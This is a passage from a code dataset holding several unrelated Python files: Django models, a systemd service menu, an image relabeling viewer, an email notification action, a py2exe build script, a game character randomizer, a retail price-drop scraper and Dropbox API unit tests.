(enum_item.value, enum_item.name)\n for enum_item in ResponseTypeEnum.__members__.values()\n ])\n\n url = models.ForeignKey(\"Url\", editable=False,\n on_delete=models.CASCADE, related_name=\"response\")\n raw = models.OneToOneField(\n \"Raw\", on_delete=models.CASCADE, related_name=\"response\")\n request = models.OneToOneField(\n \"Request\", on_delete=models.CASCADE, related_name=\"response\")\n\n status_code = models.IntegerField(editable=False, help_text=\"响应码\")\n response_header = models.JSONField(editable=False, help_text=\"原始请求\")\n response_body = models.BinaryField(\n max_length=5 * 1024, editable=False, help_text=\"响应 body\")\n response_type = models.CharField(\n max_length=255,\n choices=RESPONSE_TYPE,\n default=ResponseTypeEnum.other.value,\n help_text=\"响应类型\"\n )\n\n class Meta:\n ordering = ['url', ]\n constraints = [\n models.UniqueConstraint(\n fields=['url', 'raw', 'request'], name='unique_response')\n ]\n\n @classmethod\n def from_response(cls, url_id, raw_id, request_id, response: ResponseObject, response_type: str):\n i, _ = cls.objects.get_or_create(\n url_id=url_id,\n raw_id=raw_id,\n request_id=request_id,\n defaults=dict(\n response_type=response_type,\n status_code=response.status_code,\n response_header=headers_to_list(response.headers),\n response_body=response.content,\n )\n )\n return i\n\n @property\n def response(self):\n return ResponseObject(\n status_code=self.status_code,\n headers=list_to_headers(self.request_headers),\n content=self.request_type,\n )\n\n\n# singals\n@receiver(models.signals.post_save, sender=Raw)\ndef raw_post_created(\n sender, instance: Raw, created: bool, **kwargs\n):\n if not created:\n return\n request_object = instance.request_object\n # create request\n request = Request.from_request(\n instance.url_id,\n instance.id,\n request_object,\n request_object.request_type,\n )\n logger.info(\"create request {}:{} {} with type {}\", request.id,\n request.method, request_object.pure_url, request.request_type)\n # create response\n if instance.raw_response:\n response = Response.from_response(\n instance.url_id,\n instance.id,\n request.id,\n instance.response_object,\n instance.response_object.response_type,\n )\n logger.info(\"create response for request {} with type {}\",\n request.id, response.response_type)\n","sub_path":"backend/raw/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"527143197","text":"import argparse\nimport os\nimport sys\n\nimport redis\n\nfrom pystdlib import shell_cmd\nfrom pystdlib.uishim import get_selection, notify\nfrom pystdlib.systemd import list_units, unit_perform, unit_show\nfrom pystdlib.xlib import switch_desktop\n\nservices = []\n\noperations = [\n \"stop\",\n \"restart\",\n \"journal\",\n \"status\",\n]\n\nparser = argparse.ArgumentParser(description=\"SystemD services management.\")\nparser.add_argument(\"--invalidate-cache\", \"-i\", dest=\"invalidate\", action=\"store_true\",\n help=\"drop units cache from Redis\")\n\nargs = parser.parse_args()\n\nr = redis.Redis(host='localhost', port=6379, db=0)\n\n\nif args.invalidate:\n shell_cmd(\"pkexec systemctl daemon-reload\", shell=True,\n stdout=sys.stdout, stderr=sys.stdout)\n r.delete(\"system/services\")\n sys.exit(0)\n\nif not r.exists(\"system/services\"):\n r.lpush(\"system/services\", *list_units())\n\nservice = get_selection(sorted(list(dict.fromkeys([service.decode() for service in r.lrange(\"system/services\", 0, -1)]))),\n 'service', lines=20, font=\"@wmFontDmenu@\")\nif not service:\n sys.exit(1)\noperation = get_selection(operations, '> ', lines=5, font=\"@wmFontDmenu@\")\nif not operation:\n sys.exit(1)\n\nif operation in [\"journal\", \"status\"]:\n unit_show(service, operation, user=('user' in service),\n shell=[\"@defaultTerminal@\", \"-e\"], tmux_session=\"@tmuxDefaultSession@\")\n switch_desktop(1)\nelse:\n unit_perform(service, operation, user=('user' in service))\nnotify(f\"[srvctl :: {operation}]\", f\"{service}\", timeout=5000)\n","sub_path":"modules/housekeeping/scripts/srvctl.py","file_name":"srvctl.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"449452150","text":"import os\n\nimport util\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\ndata_home = '/home/hwy/datasets'\nroot_total = data_home + '/NCFM/train/train'\n\n# with open('../relabels.csv') as f:\n# for line in f:\n# fname, orig, target = line.split()\n# print('{} {} {}'.format(fname, orig, target))\n# img = Image.open(os.path.join(root_total, orig, fname + '.jpg'))\n# plt.imshow(img)\n# plt.show()\n\n\nDup = None\ncorrection = [('img_06460.jpg', 'ALB', 'NoF'),\n ('img_00568.jpg', 'ALB', 'NoF'),\n ('img_07439.jpg', 'ALB', None),\n ('img_02271.jpg', 'SHARK', 'NoF'),\n ('img_00248.jpg', 'ALB', 'OTHER'),\n ('img_01363.jpg', 'ALB', 'OTHER'),\n ('img_01452.jpg', 'OTHER', 'LAG'),\n ('img_02086.jpg', 'ALB', 'YFT'),\n ('img_02271.jpg', 'SHARK', 'NoF'),\n ('img_02302.jpg', 'NoF', 'ALB'),\n ('img_02325.jpg', 'NoF', 'OTHER'),\n ('img_04052.jpg', 'NoF', 'OTHER'),\n ('img_04131.jpg', 'SHARK', 'NoF'),\n ('img_04880.jpg', 'OTHER', 'ALB'),\n ('img_06266.jpg', 'NoF', 'OTHER'),\n ('img_06478.jpg', 'NoF', 'OTHER'),\n ('img_06706.jpg', 'OTHER', 'ALB'),\n ('img_07212.jpg', 'DOL', 'OTHER'),\n ('img_07779.jpg', 'OTHER', Dup),\n ]\n\nfor fname, orig, target in correction:\n print('{} {} {}'.format(fname, orig, target))\n img = Image.open(os.path.join(root_total, orig, fname))\n plt.imshow(img)\n plt.show()\n","sub_path":"util/relabels.py","file_name":"relabels.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"26137531","text":"from django.conf import settings\n\nfrom action_manager.action import Action, logger\nfrom action_manager.action_event import ActionExecutedEvent\nfrom action_manager.utils.email import send_mass_template_mail\nfrom event_manager.event_actions import EXECUTED\nfrom event_manager.event_context import get_event_context, get_readable_event\nfrom libs.string_utils import strip_spaces\n\nEMAIL_ACTION_EXECUTED = 'email_action.{}'.format(EXECUTED)\n\n\nclass EmailActionExecutedEvent(ActionExecutedEvent):\n event_type = EMAIL_ACTION_EXECUTED\n\n\nclass EmailAction(Action):\n action_key = 'email'\n name = 'Email'\n event_type = EMAIL_ACTION_EXECUTED\n description = (\"Send emails.\"\n \"Emails can be sent automatically \"\n \"by subscribing to certain events on Polyaxon, \"\n \"or manually triggered by a user operation.\")\n\n @classmethod\n def _validate_config(cls, config):\n if not config:\n return {}\n\n recipients = config.get('recipients')\n if not recipients:\n return {}\n\n if isinstance(recipients, str):\n recipients = strip_spaces(recipients, sep=',', join=False)\n\n config['recipients'] = [email for email in recipients if email]\n return config\n\n @classmethod\n def _get_config(cls):\n return None\n\n @classmethod\n def serialize_event_to_context(cls, event):\n event_context = get_event_context(event)\n\n context = {\n 'subject': event_context.subject_action,\n 'notification': get_readable_event(event_context),\n }\n return {\n 'subject_template': 'notifier/subject.txt',\n 'body_template': 'notifier/body.txt',\n 'context': context\n }\n\n @classmethod\n def _prepare(cls, context):\n context = context or {}\n context['subject_template'] = (\n context.get('subject_template') or\n context.get('subject') or\n ''\n )\n context['body_template'] = (\n context.get('body_template') or\n context.get('body') or\n ''\n )\n context['context'] = (\n context.get('context') or\n None\n )\n return context\n\n @classmethod\n def _execute(cls, data, config):\n if not all([settings.EMAIL_HOST_USER, settings.EMAIL_HOST_PASSWORD]):\n logger.debug(\"Email was not setup, skipping send.\")\n return\n\n recipients = config.get('recipients')\n\n if not recipients:\n logger.warning(\"No emails given, skipping send.\")\n return\n\n subject_template = data['subject_template']\n body_template = data['body_template']\n context = data['context']\n\n send_mass_template_mail(subject_template, body_template, recipients, context=context)\n","sub_path":"polyaxon/action_manager/actions/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"538821788","text":"from distutils.core import setup\r\nimport py2exe, sys, os\r\nfrom glob import glob\r\nfrom test.test_ssl import data_file\r\nimport zmq.libzmq\r\n\r\n#####Begin of matplot#####\r\nfrom distutils.filelist import findall\r\nimport os\r\nimport matplotlib\r\nmatplotlibdatadir = matplotlib.get_data_path()\r\nmatplotlibdata = findall(matplotlibdatadir)\r\nmatplotlibdata_files = []\r\nfor f in matplotlibdata:\r\n dirname = os.path.join('matplotlibdata', f[len(matplotlibdatadir)+1:])\r\n matplotlibdata_files.append((os.path.split(dirname)[0], [f]))\r\n\r\n#matplotlib.use('wxagg')\r\n#####End of matplot#####\r\n\r\n\r\nsys.path.append(\"c:\\python27\\DLLs\\MSVCP90.dll\")\r\n\r\nsetup(\r\n windows = [\"PingAnalyzerGui.py\"],\r\n \r\n options = {'py2exe': {'compressed': True,\r\n 'includes': ['zmq.backend.cython', \r\n 'numpy',\r\n 'matplotlib',\r\n 'matplotlib.backends.backend_tkagg'\r\n ],\r\n \r\n 'excludes': ['zmq.libzmq', \r\n #'_gtkagg', # if doesn't run, remove excluding these backends\r\n #'_tkagg' # if doesn't run, remove excluding these backends \r\n ],\r\n \r\n 'dll_excludes': ['libzmq.pyd',\r\n 'libgdk-win32-2.0-0.dll',\r\n 'libgobject-2.0-0.dll',\r\n 'libgdk_pixbuf-2.0-0.dll'\r\n ],\r\n \r\n 'packages': ['matplotlib',\r\n 'pytz',\r\n 'FileDialog',\r\n 'scipy',\r\n \r\n ],\r\n }\r\n },\r\n \r\n data_files = [\r\n ('lib', (zmq.libzmq.__file__,)),\r\n #('.', glob('*.dll')),\r\n #('pyds', glob(r'C:\\Users\\jxue\\git\\PingAnalyzer\\PingAnalyzer\\pyds\\*.pyd',)), \r\n ],\r\n \r\n zipfile = None,\r\n)\r\n\r\n\r\n#\r\n# \r\n# Make sure you have the license if you distribute any of them, and\r\n# make sure you don't distribute files belonging to the operating system.\r\n# \r\n# OLEAUT32.dll - C:\\Windows\\system32\\OLEAUT32.dll\r\n# USER32.dll - C:\\Windows\\system32\\USER32.dll\r\n# IMM32.dll - C:\\Windows\\system32\\IMM32.dll\r\n# SHELL32.dll - C:\\Windows\\system32\\SHELL32.dll\r\n# ole32.dll - C:\\Windows\\system32\\ole32.dll\r\n# COMDLG32.dll - C:\\Windows\\system32\\COMDLG32.dll\r\n# fftpack_lite.pyd - c:\\python27\\lib\\site-packages\\numpy\\fft\\fftpack_lite.pyd\r\n# COMCTL32.dll - C:\\Windows\\system32\\COMCTL32.dll\r\n# ADVAPI32.dll - C:\\Windows\\system32\\ADVAPI32.dll\r\n# _quadpack.pyd - c:\\python27\\lib\\site-packages\\scipy\\integrate\\_quadpack.pyd\r\n# msvcrt.dll - C:\\Windows\\system32\\msvcrt.dll\r\n# WS2_32.dll - C:\\Windows\\system32\\WS2_32.dll\r\n# GDI32.dll - C:\\Windows\\system32\\GDI32.dll\r\n# MSVCP90.dll - c:\\python27\\DLLs\\MSVCP90.dll\r\n# KERNEL32.dll - C:\\Windows\\system32\\KERNEL32.dll\r\n# _cblas.pyd - c:\\python27\\lib\\site-packages\\scipy\\linalg\\_cblas.pyd\r\n# minpack2.pyd - c:\\python27\\lib\\site-packages\\scipy\\optimize\\minpack2.pyd\r\n# _umath_linalg.pyd - c:\\python27\\lib\\site-packages\\numpy\\linalg\\_umath_linalg.pyd","sub_path":"PingAnalyzer/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"250974250","text":"#eggplant\n#aubergine\nfrom random import choice\nfrom random import randint\nfrom random import shuffle\nattributenum = randint(0,7)\nskillnum = randint(0,26)\n\n# Birth signs\nsigns = [\"tower\", \"shadow\", \"lover\", \"ritual\", \"atronach\", \"apprentice\", \"lord\", \"steed\", \"lady\", \"serpent\", \"thief\", \"mage\",\n \"warrior\"]\n\n # Skills\nskills = [\"heavy armour\", \"medium armour\", \"spear\", \"acrobatics\", \"armourer\", \"axe\", \"blunt\", \"long blade\",\n\"block\", \"light armour\", \"marksman\", \"sneak\", \"athletics\", \"hand-to-hand\", \"short blade\", \"unarmoured\", \"illusion\",\n\"mercantile\", \"speechcraft\", \"alchemy\", \"conjuration\", \"enchant\", \"security\", \"alteration\", \"destruction\", \"mysticism\", \"restoration\"]\n\n# Races\nraces = [\"altmer\", \"argonian\", \"bosmer\", \"breton\", \"dunmer\", \"imperial\", \"khajiit\", \"nord\", \"orc\", \"redguard\"]\n\n# Attributes\nattributes = [\"agility\", \"endurance\", \"intelligence\", \"luck\", \"personality\", \"speed\", \"strength\", \"willpower\"]\nprint(\"Your race is \" + choice(races))\nprint(\"\\nYour birthsign is \" + choice(signs))\n\n# These are for the skill loops below\nskillcalc = 0\nattributecalc = 0\n\n# These randomize the skills and attributes lists\nskill_order = skills[:]\nshuffle(skill_order)\nattribute_order = attributes[:]\n\n# We use .pop() so we don't print the same item twice\nprint(\"\\nYour major skills are as follows:\")\nfor skillcalc in range(0,5):\n\tprint(skill_order.pop())\n\tskillcalc + 1\nprint(\"\\nYour minor skills are as follows:\")\nskillcalc = 0\nfor skillcalc in range(0,5):\n\tprint(skill_order.pop())\n\tskillcalc + 1\nprint(\"\\nYour primary attributes are as follows:\")\nfor attributecalc in range(0,2):\n\tprint(attribute_order.pop())\n\tattributecalc + 1\n","sub_path":"morrowind.py","file_name":"morrowind.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"182470110","text":"import concurrent.futures\nimport os\nimport re\nimport sys\nimport json\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\nPROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))\nDRIVER_BIN = os.path.join(PROJECT_ROOT, \"chromedriver_tux\")\noption = webdriver.ChromeOptions()\noption.add_argument('headless')\n\n\ndef netmeds(generic_name):\n names = []\n prices = []\n try:\n url = \"https://www.netmeds.com/catalogsearch/result?q=\" + generic_name\n driver = webdriver.Chrome(executable_path=DRIVER_BIN, options=option)\n driver.get(url)\n res = driver.execute_script(\"return document.documentElement.outerHTML\")\n soup = BeautifulSoup(res, 'lxml')\n main_container = soup.find(\"div\", {\"class\": \"left-block\"})\n all_drugs = main_container.find_all(\"div\", {\"class\": \"drug_list\"})\n for drug in all_drugs:\n # file_name = open(\"names.txt\", 'a')\n # file_price = open(\"prices.txt\", 'a')\n drug_name = drug.find(\"div\", {\"class\": \"info\"}).text\n price = drug.find(\"div\", {\"class\": \"pricebox\"}).text\n price = re.sub('[^0-9.]', \"\", price)\n price = str(price)[1:]\n price = price[:5]\n cleaned_name = re.sub('[^A-Za-z0-9 ]+', '', drug_name)\n cleaned_name = str(cleaned_name)[41: -40]\n names.append(cleaned_name)\n # price = price.replace(\" \", \"\")\n prices.append(price)\n # file_name.write(cleaned_name+ '\\n')\n # print(price)\n # file_price.write(str(price) + \"\\n\")\n return names, prices\n except:\n names.append(\"No results found\")\n prices.append(\"999999\")\n return names, prices\n\n\ndef one_mg(generic_name):\n names = []\n prices = []\n try:\n url = \"https://www.1mg.com/search/all?filter=true&name=\" + generic_name\n driver = webdriver.Chrome(options=option)\n driver.get(url)\n res = driver.execute_script(\"return document.documentElement.outerHTML\")\n soup = BeautifulSoup(res, 'lxml')\n main_container = soup.find(\"div\", {\"class\": \"row style__grid-container___3OfcL\"})\n all_drugs = main_container.find_all(\"div\", {\"class\": \"col-xs-12 col-md-9 col-sm-9 style__container___cTDz0\"})\n for drug in all_drugs:\n drug_name = drug.find(\"div\", {\"class\": \"style__product-description___1vPQe\"}).text\n price = drug.find(\"div\", {\"class\": \"style__price-tag___B2csA\"}).text\n price = re.sub('[^0-9.]', \"\", price)\n names.append(drug_name)\n prices.append(price)\n return names, prices\n except:\n names.append(\"No results found\")\n prices.append(\"999999\")\n return names, prices\n\n\ndef main(generic):\n with concurrent.futures.ThreadPoolExecutor() as executor:\n future1 = executor.submit(netmeds, generic)\n future2 = executor.submit(one_mg, generic)\n\n names_netmed, price_netmed = future1.result()\n names_1mg, price_1mg = future2.result()\n source_netmed = [\"netmeds\"] * len(names_netmed)\n source_1mg = [\"1mg\"] * len(names_1mg)\n names = names_netmed + names_1mg\n prices = price_netmed + price_1mg\n source = source_netmed + source_1mg\n df = pd.DataFrame(\n {\n \"medicine_name\": names,\n \"Price\": prices,\n \"Source\": source\n }\n )\n df.sort_values(by=['Price'], inplace=True)\n try:\n df_json = df.iloc[:10, :].to_dict(orient=\"records\")\n\n except:\n print(\"error creating file\")\n\n try:\n print(json.dumps(df_json))\n\n except:\n print(\"error printing\")\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n","sub_path":"backend/controllers/scraper/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"485758676","text":"starting = input(\"Enter the Amount \")\r\nno_of_yrs = int(input(\"Enter the Number of Years\"))\r\ncounter = 1\r\nnew = 0\r\nprint(\"Amount for the 2018 \" + starting)\r\nif counter < no_of_yrs:\r\n new = int(starting) *2\r\n print(\"Amount is \" +str(new))\r\n starting = str(new)\r\n counter = counter + 1\r\nelse :\r\n print(\"Enter value properly\")","sub_path":"Python/Project01/Project01/file01.py","file_name":"file01.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"428476682","text":"# -*- coding: utf-8 -*-\n\nimport copy\nimport time\nfrom unittest import TestCase\n\nfrom dbxobject import DbxObject\nfrom test_data import *\n\n\nclass TestDbxObject(TestCase):\n def setUp(self):\n super(TestDbxObject, self).setUp()\n\n # def test_update(self):\n # self.fail()\n #\n # def test__get_time(self):\n # self.fail()\n #\n # def test__has_key(self):\n # self.fail()\n #\n # def test__return(self):\n # self.fail()\n #\n # def test_get_key(self):\n # self.fail()\n #\n # def test_remove_key(self):\n # self.fail()\n\n def test_is_valid(self):\n a1 = DbxObject(data_error)\n self.assertTrue(a1.is_valid)\n\n a2 = DbxObject(data_file)\n self.assertTrue(a2.is_valid)\n\n a3 = DbxObject(data_folder_metadata)\n self.assertTrue(a3.is_valid)\n\n def test_is_error(self):\n a2 = DbxObject(data_error_path_not_found)\n self.assertTrue(a2.is_error)\n self.assertTrue(a2.is_error_not_found)\n\n a2 = DbxObject(data_folder_metadata)\n self.assertFalse(a2.is_error)\n\n a2 = DbxObject(data_error)\n self.assertTrue(a2.is_error)\n\n e1 = copy.deepcopy(data_error)\n a2 = DbxObject(e1)\n self.assertTrue(a2.is_error_not_found)\n e1['error']['.tag'] = 'other'\n a2 = DbxObject(e1)\n self.assertFalse(a2.is_error_not_found)\n\n e1 = copy.deepcopy(data_error)\n a2 = DbxObject(e1)\n self.assertTrue(a2.is_error_not_found)\n e1['error']['path']['.tag'] = 'other'\n a2 = DbxObject(e1)\n self.assertFalse(a2.is_error_not_found)\n\n def test_error_summary(self):\n a2 = DbxObject(data_error)\n self.assertEquals(a2.error_summary, data_error['error_summary'])\n\n def test_is_error_not_found(self):\n a2 = DbxObject(data_error_path_not_found)\n self.assertTrue(a2.is_error)\n self.assertTrue(a2.is_error_not_found)\n\n def test_is_expired(self):\n a2 = DbxObject(data_folder_metadata)\n self.assertFalse(a2.is_expired)\n DbxObject.cache_time = 1\n time.sleep(2)\n self.assertFalse(a2.is_expired)\n\n # def test_valid_until(self):\n # self.fail()\n\n # def test_tag(self):\n # self.fail()\n\n def test_is_folder(self):\n a2 = DbxObject(data_file)\n self.assertFalse(a2.is_folder)\n\n a3 = DbxObject(data_folder_metadata)\n self.assertTrue(a3.is_folder)\n\n def test_is_file(self):\n a2 = DbxObject(data_file)\n self.assertTrue(a2.is_file)\n\n a3 = DbxObject(data_folder_metadata)\n self.assertFalse(a3.is_file)\n\n def test_is_fs_entry(self):\n a3 = DbxObject(data_folder_metadata)\n self.assertTrue(a3.is_fs_entry)\n a2 = DbxObject(data_file)\n self.assertTrue(a2.is_fs_entry)\n a2 = DbxObject(data_error)\n self.assertFalse(a2.is_fs_entry)\n\n def test_is_deleted(self):\n a2 = DbxObject(data_folder_metadata_deleted)\n self.assertTrue(a2.is_deleted)\n\n a3 = DbxObject(data_folder_metadata)\n self.assertFalse(a3.is_deleted)\n\n def test_has_more(self):\n a2 = DbxObject(data_folder_metadata)\n self.assertFalse(a2.has_more)\n\n a2 = DbxObject(data_folder_entries)\n self.assertTrue(a2.has_more)\n\n a2 = DbxObject(data_folder_entries_recursive)\n self.assertFalse(a2.has_more)\n\n def test_cursor(self):\n a2 = DbxObject(data_folder_metadata)\n self.assertIsNone(a2.cursor)\n\n a2 = DbxObject(data_folder_entries)\n self.assertEqual(a2.cursor, data_folder_entries['cursor'])\n\n def test_has_entries(self):\n a2 = DbxObject(data_folder_entries)\n self.assertTrue(a2.has_entries)\n\n a2 = DbxObject(data_file)\n self.assertFalse(a2.has_entries)\n\n def test_entries(self):\n a2 = DbxObject(data_folder_entries)\n self.assertTrue(a2.has_entries)\n self.assertEquals(3, len(a2.entries))\n\n def test_has_sub_items(self):\n a2 = DbxObject(data_folder_entries)\n self.assertTrue(a2.has_entries)\n\n a2 = DbxObject(data_file)\n self.assertFalse(a2.has_entries)\n\n def test_sub_items(self):\n a2 = DbxObject(data_folder_entries)\n self.assertEquals(3, len(a2.sub_items))\n\n def test_path(self):\n a2 = DbxObject(data_file)\n self.assertEquals(\"/test/subfolder/a6w.odt\", a2.path)\n\n def test_basename(self):\n a2 = DbxObject(data_file)\n self.assertEquals(\"a6w.odt\", a2.basename)\n\n def test_parent_path(self):\n a2 = DbxObject(data_file)\n self.assertEquals(\"/test/subfolder\", a2.parent_path)\n\n def test_server_modified(self):\n a2 = DbxObject(data_file)\n t = a2.server_modified\n # self.assertEquals(data_file['server_modified'],t.strftime(\"%Y-%m-%dT%H:%M:%SZ\"))\n self.assertEquals(1505629042, t)\n\n def test_server_modified_folder(self):\n now = int(time.time())\n a2 = DbxObject(data_folder_entries_recursive)\n t = a2.server_modified\n self.assertGreaterEqual(t, now)\n\n def test_client_modified(self):\n a2 = DbxObject(data_file)\n t = a2.client_modified\n # self.assertEquals(data_file['client_modified'],t.strftime(\"%Y-%m-%dT%H:%M:%SZ\"))\n self.assertEquals(1505629042, t)\n\n def test_client_modified_folder(self):\n now = int(time.time())\n a2 = DbxObject(data_folder_entries_recursive)\n t = a2.client_modified\n self.assertGreaterEqual(t, now)\n\n def test_size(self):\n a2 = DbxObject(data_file)\n self.assertEquals(19754, a2.size)\n","sub_path":"tests/test_dbxobject.py","file_name":"test_dbxobject.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"419662028","text":"# import libraries\nimport smtplib\nimport json\nimport time\nimport requests\nimport re\nimport os\nfrom random import choice\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\n\n# notification email\ndef send_mail(message):\n sender = 'from@fromdomain.com'\n receivers = ['to@todomain.com']\n message = ( \n \"From: From Person \\n\"\n \"To: To Person \\n\"\n \"Subject: A price has dropped for one of your tracked products\\n\"\n \"{}.\\n\".format(message)\n )\n try:\n smtpObj = smtplib.SMTP('localhost', 1025)\n smtpObj.sendmail(sender, receivers, message) \n r = \" Successfully sent email.\\n\"\n except:\n r = error_header + \" Email was not sent. Make sure to follow the instructions in Help to launch a debugging SMTP server.\\n\"\n return r\n\n\n# update json file\ndef update_json(trackers, file = 'tracker.json'):\n with open(file, 'w') as f:\n json.dump(trackers, f, indent = 4)\n\n\n# initiate browser session and retrieve and return webpage data\ndef get_session(url):\n if \"bestbuy.com\" in url: # beautifulsoup is faster and headless so I prefer this method for compatible websites\n with open('headers.json') as file:\n data = json.load(file)\n header = data[choice(list(data.keys()))] # random header picker -- originally used as a clever way to prevent amazon blocking scrape, but that no longer works so I switched to Selenium\n r = requests.Session()\n response = r.get(url, headers = header)\n page = BeautifulSoup(response.content, 'html.parser')\n else: # selenium is used for target and amazon\n PATH = os.getcwd() + driver\n page = webdriver.Chrome(PATH)\n page.get(url)\n return page\n\n\n# builds the different messages printed to screen for each command\ndef start_msg(command, message, quit = False):\n os.system(clear)\n c = command\n m = message \n arrow_a = ''\n arrow_v = ''\n arrow_t = '' \n arrow_q = '' \n print(\n \"///// PRICE DROP SCRAPER ///////\\n\"\n \" Monitors the price of chosen products from popular retailers and emails if the price drops.\\n\"\n \" Created by Wesley Cox for Code Louisville 2020 Python\"\n )\n retailer_list = (\n \"\\n///// RETAILERS ////////////////\\n\"\n \" amazon.com\\n\"\n \" bestbuy.com\\n\"\n \" target.com\\n\"\n )\n if c in ('v', 't'): # this block \n if any([len(trackers[i]) > 0 for i in trackers]): # if any products are saved we want to list them and save them for later.\n m = list_trackers(c) + m\n if c == 'v':\n arrow_v = \" <--\"\n if c == 't':\n print(\n \"\\n///// IMPORTANT ////////////////\\n\"\n \" The intent of this command is to check all saved product pages every 43200 seconds (12 hours),\\n\"\n \" compare saved price with current price, and send an email if the price has dropped.\\n\"\n \" However, this is a proof-of-concept demonstration. This app is not currently setup to actually track persistently or send emails.\\n\"\n \" This command simply allows testing of those functions. Type h and press enter/return for more details.\\n\"\n )\n arrow_t = \" <--\"\n else: # if no products are saved we want to block v and t commands.\n c = 'a'\n arrow_a = \" <--\"\n m = alert_header + ' There are no product pages being tracked. Add at least one product to execute \"Remove Products\" or \"Track Price\" commands.\\n'\n elif c == 'a':\n arrow_a = \" <--\"\n m = retailer_list + m\n else:\n arrow_q = \" <--\"\n if not quit:\n m = m + ( \"\\n///// COMMANDS /////////////////\\n\"\n \" a: Add products\" + arrow_a + \"\\n\"\n \" v: View or remove products\" + arrow_v + \"\\n\"\n \" t: Track price\" + arrow_t + \"\\n\"\n \" h: Help\\n\"\n \" ^+c: Quit app\" + arrow_q + \"\\n\"\n )\n print(m)\n return c\n \n \n# web scraper\ndef scrape(url, update = True):\n http = re.search('^https:\\/\\/www.(bestbuy.com|amazon.com|target.com)', url[:25]) # only need to search beginning of url string\n if http:\n retailer = url[url.find('.')+1:url.find('.com')] + '.com'\n print('\\n' + alert_header + \" Processing...\\n\")\n try:\n page = get_session(url)\n except:\n r = error_header + ' Configuration issue with Selenium or Beautiful Soup.\\n Make sure they\\'re installed and that the \"chromedriver\" file is saved in the current directory.\\n'\n else:\n dict = {'title': '', 'price': '', 'url': url}\n try:\n if \"target.com\" in url:\n price = page.find_element_by_xpath('/html/body/div[1]/div/div[5]/div/div[2]/div[2]/div[1]/div[1]/div[1]').text\n dict['title'] = page.title\n page.quit()\n elif \"amazon.com\" in url:\n try:\n price = page.find_element_by_id(\"priceblock_ourprice\").text\n except:\n price = page.find_element_by_id(\"priceblock_dealprice\").text\n dict['title'] = page.title\n page.quit()\n elif \"bestbuy.com\" in url:\n with open('bestbuy.json', 'w') as f:\n json.dump(page, f, indent=4, default=str)\n price = page.find(attrs = {'class':'priceView-hero-price priceView-customer-price'}).span.get_text()\n dict['title'] = page.find(attrs = {'class':'sku-title'}).get_text()\n dict['price'] = float(price.replace(',','')[1:])\n if update:\n trackers[retailer].append(dict)\n update_json(trackers)\n r = success_header + \" {} from {} is now being tracked.\\n\".format(dict['title'], retailer)\n else:\n r = dict['price']\n except:\n r = error_header + ' Was not able to find a price. Either the URL is not a product page or product is no longer available.\\n Type h and press enter/return for more details.\\n'\n else:\n r = error_header + ' Not a valid command or URL. Needs to be a command from the list below or a complete URL including \"http(s)://\" and from compatible retailer.\\n Type h and press enter/return for more details.\\n'\n try:\n page.quit()\n except:\n pass\n return r\n\n\n# periodically scrapes saved urls and sends email if price has dropped\ndef tracker(ui):\n retailer, title, price, url, tmp = tracker_list[0]\n price_override = price + 10\n if ui == 'y':\n t = 30\n print('\\n///// WAITING //////////////////')\n while t > 10:\n print(' ', str(t), 'seconds...')\n t -= 10\n time.sleep(10)\n while t > 0:\n if t == 1:\n print(' ', str(t), 'second...')\n else:\n print(' ', str(t), 'seconds...')\n t -= 1\n time.sleep(1)\n try:\n new_price = scrape(url, False)\n m = success_header + \" Last scrape: \" + str(time.ctime()) + '\\n'\n if new_price < price_override:\n drop = '{:.2f}'.format(price_override - new_price)\n msg = \"{} from {} dropped by ${}:\\n{}\".format(title, retailer, drop, url)\n email = send_mail(msg)\n m += f' Price dropped ${drop}\\n' + email\n else:\n m += ' Price did not drop.\\n' # this shouldn't ever trigger since we're intentionally making price higher. \n except:\n m = error_header + \" There was an ERROR processing the URL. It's possible the product is no longer available or the webpage has changed.\\n\"\n elif ui == 'n':\n m = alert_header + ' Tracker not started. You can exit using one of the commands in the menu.\\n'\n else:\n m = error_header + ' Invalid command. Choose yes or no or a valid command from the menu.\\n Type h and press enter return for more details.\\n'\n return m\n\n\ndef view(ui):\n try: # need to test that user input was a valid number before we proceed.\n ui = int(ui)\n if ui < 1: # negatives aren't necessarily out of range so we need to catch those. \n raise Exception\n title = tracker_list[ui-1][1]\n except:\n m = error_header + \" Not a valid command or number option. Type h(v) and press enter/return for more details.\\n\"\n else:\n sure = input(\"\\nAre you sure you want to delete {}? (y/n):\\n\".format(title)).lower()\n if sure == 'y': # delete tracker and update json\n del trackers[tracker_list[ui-1][0]][tracker_list[ui-1][4]]\n update_json(trackers)\n m = success_header + \" Product successfully removed.\\n\"\n else:\n m = alert_header + ' No products were removed.\\n'\n return m\n\n\n# checks to see if user input is a command rather than an option\ndef command_menu(ui, command):\n ui = ui.lower()\n h = re.search(\"^h\\((.*)\\)$\", ui) \n if ui == 'h':\n r = help(command, True)\n elif h:\n opt = h.groups()[0]\n r = help(opt)\n elif ui == '^+c':\n r == help(ui)\n elif ui in ('a', 'v', 't'):\n r = 